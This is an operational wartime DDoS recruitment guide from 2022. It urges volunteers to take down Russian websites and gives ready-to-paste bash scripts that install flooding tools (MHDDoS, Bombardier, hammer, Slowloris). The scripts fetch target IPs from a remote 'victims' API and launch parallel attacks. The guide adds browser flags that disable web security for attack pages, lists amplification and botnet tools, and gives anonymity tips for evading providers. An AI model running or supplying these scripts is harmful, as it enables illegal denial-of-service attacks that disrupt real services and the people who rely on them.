IT Army of Ukraine - Cyber Weapons Division ===  ## Introduction Russia has invaded Ukraine and commited various [war crimes](https://edition.cnn.com/2022/02/26/europe/ukraine-russia-invasion-sunday-intl-hnk/index.html). Russian media denies any of its attacks on civilian as well as denies any Russian troops casualties. According to them, they are doing this "special operation" to protect Ukrainians from... Ukraine. [Mykhailo Federov](https://twitter.com/FedorovMykhailo) (Vice Prime Minister and Minister of Digital Transformation of Ukraine) has shared [this twitter post](t.me/itarmyofurraine) encouraging cyber attack on certain targets via [Telegram group](https://t.me/itarmyofukraine2022). This will be the primary source of the target websites for this application. Some foreign media and even countries (e.g. Belarus) [publicly support Russian aggression towards Ukraine.](https://time.com/6151347/belarus-russia-ukraine/) More info at https://war.ukraine.ua/ **BEWARE, It's a cyberwar, but DDoS is considered illegal in almost every country.** **Also, you will risk having your internet blocked by your provider or having your contract cancelled.** _I don`t support aggression over peaceful entities, but we are in war, we are defending ourselves, and helping the assaulted to defend from its agressor, in that case, I dont see any ethical or moral violation in DDoSing the agressor_ This document is in constant update. You may find new and updated content as you visit this document again. ## Usage ### Using a Web Browser Your mission here is simple, you will [DDoS](https://en.wikipedia.org/wiki/Denial-of-service_attack) on strategic Russian websites/endpoints in order to take them down or significantly distrupt their services.  By now you have two different methods, first is using one of the URLs below. The other option is by using a DDoS script on Ubuntu Linux. You may want to use a VPN service to hide your identity before doing it, I recommend using [Hola VPN on Opera Browser](https://addons.opera.com/en/extensions/details/hola-better-internet/) > [Opera Browser also has a built-in VPN option](https://blogs.opera.com/news/2016/09/how-to-set-up-a-vpn-mac-windows-linux/) I also recommend [changing your DNS server](https://www.windowscentral.com/how-change-your-pcs-dns-settings-windows-10) to [9.9.9.9](https://www.quad9.net/) and using [DNS over HTTPS](https://4sysops.com/archives/secure-dns-requests-over-https-doh-in-windows-1011/), and also use [randomized MAC Addresses](https://support.microsoft.com/en-us/windows/how-to-use-random-hardware-addresses-in-windows-ac58de34-35fc-31ff-c650-823fc48eb1bc#:~:text=a%20specific%20network%3A-,Select%20the%20Start%20button%2C%20then%20select%20Settings%20%3E%20Network%20%26%20Internet,hardware%20addresses%20for%20this%20network.) If you're ok with Linux, ideally you may want to [boot a Tails Linux OS](https://www.techrepublic.com/article/getting-started-with-tails-the-encrypted-leave-no-trace-operating-system/#:~:text=During%20the%20bootup%20process%2C%20press,on%20your%20second%20USB%20drive.) Instead, this is the safest option. **You can use any of the following website below, just leave it opened in your browser as long as possible:** **https://fuckyourussianwarship.netlify.app** **https://ddosmonitor.pp.ua/** Also check: > > **https://github.com/Arriven/db1000n** > > Cossacks, we present you a new weapon! > > Our own program - Death by 1000 needles (DB1000N) > > This is software for coordinated DDoS attacks on the occupier's infrastructure. The main advantage of this method is that users only need to run the program on a PC to carry out attacks, and all coordination will be carried out and configured by administrators with the support of cybersecurity specialists. > > Instructions for use and all necessary links are in this document > > Please join everyone and download the program to your PC before the evening attacks, because then we will carry out the first attack with DB1000N. Stay tuned for the channel and upcoming updates. Other options: https://stop-russian-desinformation.near.page/ https://the-list.ams3.cdn.digitaloceanspaces.com/index.html https://russianwarshipgofuckyourself.club/ https://norussian.tk/ https://stopwarnow.github.io/ https://ipfs.io/ipfs/QmYKMHHNfdxfhDtXujimFaG83ZkgkTo61p8jZ6Dww9kJaN?filename=index.html _IPFS is a distributed uncensorable file system, please upload the html/js DDoS tools to IPFS nodes to avoid censorship, and let me know to update the document with the IPFS link._ Disabling CORS is necessary to be able to get the most performance out of those pages.  See how [here](https://stackoverflow.com/a/58658101/1644554). Or you can simply [use a browser extension](https://chrome.google.com/webstore/detail/cors-unblock/lfhmikememgdcahcdlaciloancbhjino) If you want to attack a single target you can use: https://freestresser.to/ > You can verify some Russian servers' status at https://rustatus.xyz/status, https://ddosmonitor.pp.ua/ and http://ru-stats.eastasia.cloudapp.azure.com/status > If you need to verify an individual site, use https://downforeveryoneorjustme.com/gazprom.ru  > You can monitor the attack progress by pressing F12 (open dev tools) and navigating to the Network tab. > You can use a headless browser on the command line with those websites like Firefox. > With a headless browser you can attack using https://shell.cloud.google.com > You can [enable WSL](https://www.configserverfirewall.com/windows-10/windows-subsystem-for-linux-2/) to use a Linux Shell on your Windows system With WSL you can run all the scripts below in this article Firefox Windows: `firefox --headless --private-window https://norussian.tk/` Chrome Windows: `"[CHROME PATH HERE]/chrome.exe" --disable-web-security https://norussian.tk/` Chrome Mac: `open -na Google\ Chrome --args --user-data-dir=/tmp/temporary-chrome-profile-dir --disable-web-security --disable-site-isolation-trial https://norussian.tk/` ### Petitions and other forms of helping Please sign * https://chng.it/6QLhvNkNQM Send SMS message to Russian people, help fight Russian propaganda https://1920.in/ You can also write messages in Russian maps locations using this tool https://github.com/jamesdh/kompromat ### Using on Ubuntu Linux If you're a more advanced user, you can run a shell script on a Ubuntu Linux system to DDoS the websites. This is a script that I have made to run multiple parallel DDoS attacks. There is this tool, very nice indeed: https://github.com/seedpockets/ukrainian-warship The API currently have more than 3000 targets, the script will random select 100 of the total. We will improve the API to give precedence to priority targets and classify the targets, like military, business, the state, banks, crypto exchanges and etc... Please use a VPN before using the script, ask on Telegram groups, there is a lot of NordVPN account they are sharing, also check free options in this document below. You can also utilize this script on your Android device with Termux. https://github.com/TermuxHackz/Hammer Please check this awesome endeavour: https://github.com/prividcasper/RvK01RMD Note that those tools were made for single URLs only, so using them on multiple URLs with this script may be hardware intensive. To run the script, just copy and paste this on your terminal, and you're done. Leave it as long as possible: > If you dont want to run it on your computer you can use https://shell.cloud.google.com. See how [here](https://www.youtube.com/watch?v=gfuaRFfato8) or [here](https://www.aparat.com/v/XPn5Z) Or you can use the free VPSs listed in the footer of the document. #### Using the script with [MHDDoS](https://github.com/MHProDev/MHDDoS) DDoS Attack Script With 40 Methods ``` #!/usr/bin/env bash sudo apt update sudo apt upgrade sudo apt install jq sudo apt install git sudo apt install python sudo apt install python sudo apt install python3-pip git clone https://github.com/MHProDev/MHDDoS.git cd MHDDoS pip3 install -r requirements.txt targets_api="http://164.92.247.88:9300/victims" curl -s $targets_api | jq -r .statuses[].ip | sort --random-sort | head -n 100 > targets.txt for target in $(cat targets.txt); do  python3 start.py bypass "$target" 5 1000 socks5.txt 100 999999 & done ``` #### Using the script with [Bombardier](https://github.com/codesenberg/bombardier) Bombardier is a HTTP(S) benchmarking tool. It is written in Go programming language and uses excellent fasthttp instead of Go's default http library, because of its lightning fast performance. ``` #!/usr/bin/env bash sudo apt update sudo apt upgrade sudo apt install jq wget https://github.com/codesenberg/bombardier/releases/download/v1.2.5/bombardier-linux-amd6 chmod 770 bombardier-linux-amd64 chmod +x bombardier-linux-amd64 targets_api="http://164.92.247.88:9300/victims" curl -s $targets_api | jq -r .statuses[].ip | sort --random-sort | head -n 100 > targets.txt for target in $(cat targets.txt); do    sudo ./bombardier-linux-amd64 -c 200 -d 99999999999s -l "$target"  & done ``` Upgraded version: ``` #!/usr/bin/env bash # settings NUM_TARGETS=20 WORKERS=100 TARGETS_REFRESH=300 INSTALL_PATH="$HOME/cyberdefence-ua-ops" BOMBARDIER_EXE="./bombardier-linux-amd64" ## make sure software is updated and dependencies are installed sudo apt update sudo apt upgrade sudo apt install jq sudo apt install curl sudo apt install wget ## ensure we have Bombardier # make sure path exists mkdir -p "$INSTALL_PATH" cd "$INSTALL_PATH" # if exe is not there, then fetch it if [[ ! -x "$BOMBARDIER_EXE" ]]; then wget https://github.com/codesenberg/bombardier/releases/download/v1.2.5/bombardier-linux-amd64 chmod +x bombardier-linux-amd64 fi # "Curated" API for targets targets_api="http://164.92.247.88:9300/victims" # loop forever until ^C interrupt while : do # Get list of IPs from API, filter duplicates, random sort, and choose designated number curl -s $targets_api | \ jq -r .statuses[].ips[] | \ sort --unique | \ sort --random-sort | \ head -n "$NUM_TARGETS" \ > targets.txt # Loop through target IP list, start subprocess for each one for target in $(cat targets.txt); do #echo "$target" echo "$BOMBARDIER_EXE" -c "$WORKERS" -d "$TARGETS_REFRESH""s" -l "$target" "$BOMBARDIER_EXE" -c "$WORKERS" -d "$TARGETS_REFRESH""s" -l "$target" & done # ideally all target processes should be done after this, but we'll make sure sleep "$TARGETS_REFRESH" killall "$BOMBARDIER_EXE" done ``` #### Using the script with [hammer](https://github.com/cyweb/hammer) DoS tools written in Python ``` #!/usr/bin/env bash sudo apt update sudo apt upgrade sudo apt install python sudo apt install git sudo apt install syslinux-utils sudo apt install jq git clone https://github.com/cyweb/hammer cd hammer targets_api="http://164.92.247.88:9300/victims" curl -s $targets_api | jq -r .statuses[].ip | sort --random-sort | head -n 2 > targets.txt for target in $(cat targets.txt); do    target=$(echo $target | sed 's/https\?:\/\///') &&   target=${target%/} &&   target=$(gethostip "$target" | awk '{print $2}') &&   python3 hammer.py -s "$target" & done ``` #### Using the script with [Slowloris](https://github.com/gkbrk/slowloris.git) Send authorized HTTP traffic to the server. As it makes the attack at a slow rate, traffic can be easily detected as abnormal and can be blocked. ``` #!/usr/bin/env bash sudo apt update sudo apt upgrade sudo apt install python sudo apt install git sudo apt install jq git clone https://github.com/gkbrk/slowloris.git cd slowloris targets_api="http://164.92.247.88:9300/victims" curl -s $targets_api | jq -r .statuses[].ip | sort --random-sort | head -n 100 > targets.txt for target in $(cat targets.txt); do    python3 slowloris.py "$target"  & done ``` ##### For MacOS Users You need Python, Git, and JQ installed. If you wanna user another tool, tune accordingly. ``` git clone https://github.com/cyweb/hammer cd hammer targets_api="http://164.92.247.88:9300/victims" curl -s $targets_api | jq -r .statuses[].ip | sort --random-sort | head -n 100 > targets.txt for target in $(cat targets.txt); do    target=$(echo $target | sed 's/https\?:\/\///') &&   target=${target%/} &&   host=$(echo $target | cut -d'/' -f3) &&   target2=$(host "$host" | head -1 | awk '{print $4}') &&   python3 hammer.py -s "$target2" & done ``` ### API For Devs If you're a developer, We have created APIs with the current targets. You can help me improving this document, but you will need to create an account on hackmd.io and text me on Telegram with the email you used in order to have edit access to this document. * **Curated API Endpoint** http://164.92.247.88:9300/victims * **RAW API Endpoint:** https://api.npoint.io/7244571a09d1f5274a45 * **Another API** https://itarmy.pp.ua/api/?type=online You can fetch the data using the targets list and the target object name. On the command line, you will need curl and jq. `curl -s https://api.npoint.io/7244571a09d1f5274a45 | jq -r .targets[].target` `curl -s http://164.92.247.88:9300/victims | jq -r .statuses[].url` ### Current Targets Processed, ranked and classified: https://reqbin.com/jeqixot4 Raw data: https://reqbin.com/hot28zo2 Another source: https://itarmy.pp.ua/api/?type=online ### Free VPS https://aws.amazon.com/pt/free/ https://www.oracle.com/cloud/free/ https://gratisvps.net/ https://baehost.com/en-int/vps-argentina/vps-gratis ### Free VPNs ClearVPN * Register on https://my.clearvpn.com/ * Select a Redeem a promocode button * Enter promocode **SAVEUKRAINE** * [Download and install ClearVpn application](https://macpaw.com/clearvpn) * Login to your account. * Press the "Change your location" button and change it to Russia (prefer) or another country. **Please, do not select Ukraine on the VPN. Citizens in Ukraine must be able to access the Internet** https://protonvpn.com/ https://www.f-secure.com/ https://www.urban-vpn.com/ https://atlasvpn.com/vpn-for-windows ### Another DDoS Tools This is one is hot: https://github.com/seedpockets/ukrainian-warship https://github.com/ajax-lives/NoRussian - HTML ajax ddos https://github.com/smok-serwis/siege-engine - take a look https://github.com/1N3/Sn1per - useful to do main recon https://github.com/thesc1entist/j0lt - dns amplification tool https://github.com/OffensivePython/Saddam - dns amplification tool https://github.com/0xc0d/Slow-Loris - Slow DDos to exhaust connection  https://github.com/XCHADXFAQ77X/SLOWLORIS - another way https://github.com/gkbrk/slowloris.git - another slowloris repo https://github.com/cyweb/hammer - tool that I have used https://github.com/TermuxHackz/Hammer - same tools for Termux on android. https://github.com/Avielyo10/DNS-Amplification-Lab - other kinds of attack https://www.yougetsignal.com/tools/web-sites-on-web-server/ https://www.ip-address.org/reverse-lookup/reverse-ip.php - find other websites hosted on the same server. https://github.com/LimerBoy/Impulse https://github.com/maxng07/dns-flood https://ufonet.03c8.net/ https://github.com/MHProDev/MHDDoS - Best DDoS Attack Script Python3, Cyber Attack With 40 Methods https://sourceforge.net/projects/loic/ - Famous LOIC UDP, TCP, and HTTP requests to the server Test the performance of the network. Loic does not hide an IP address. Perform stress testing. HIVEMIND mode will allow you to control remote LOIC systems. With the help of this, you can control other computers in a zombie network. https://sourceforge.net/projects/highorbitioncannon/ - infamous hoic Attack up to 256 websites at once. counter to measure the output. ported over to Linux or Mac OS. ### Shut Down YouTube Channels! Let's shut down more news YouTube channels that openly lie about the war in Ukraine.  YouTube channels:  First channel: https://www.youtube.com/channel/UCX9-cJy8dZWDI8hCnmahuLA  Russia 24: https://www.youtube.com/c/Russia24TV  TASS: https://www.youtube.com/c/TASSagency  RIA Novosti: https://www.youtube.com/user/rianovosti  https://www.youtube.com/channel/UC8Nl7TQLC6eX8MTRCuAw3SA https://www.youtube.com/channel/UCGRcod_jR4sC9XUMLCv4GJQ https://www.youtube.com/channel/UCSqO8lV-ric7ow5G5q9roWw https://www.youtube.com/channel/UCdyhZX5wt6B6dSIAT7X9dNw https://www.youtube.com/channel/UCRHhScZmH-SfBin8tbTixPA https://www.youtube.com/channel/UC3rZ3DKoeiccjl-e-lams_g https://www.youtube.com/channel/UCJvDYmmZDbeDy5N_aBxXjpA https://www.youtube.com/channel/UCMTaJV_Gyp1YOWJwSNa0wRw https://www.youtube.com/channel/UC8lCS8Ubv3t0-Tf4IYLioTA YouTube-blogers: ZIMA LIVE: https://www.youtube.com/c/ZimaLive Соловьёв LIVE: https://www.youtube.com/channel/UCQ4YOFsXjG9eXWZ6uLj2t2A How to report channels:  ⁃ Turn on your laptop or desktop computer.  ⁃ Turn on VPN as most channels are not available in Ukraine.  ⁃ Sign in to your YouTube account.  ⁃ Open the desired channel.  ⁃ Go to the About tab.  ⁃ Find the flag image and click on it.  ⁃ Select the appropriate violation description from the drop-down menu. ### SQLi https://hackertarget.com/sqlmap-tutorial/ https://www.binarytides.com/sqlmap-hacking-tutorial/ ### Also check out other initiatives: https://github.com/erkexzcx/stoppropaganda https://www.reddit.com/r/hacking/comments/t1a8is/simple_html_dos_script_for_russian_sites/ https://www.russianwarchatter.info/ - Known Russian Military Frequencies ### Specialize If you want to become an expert and I.T Security field you may want to start reading those curated awesome guides: https://github.com/onlurking/awesome-infosec https://github.com/rmusser01/Infosec_Reference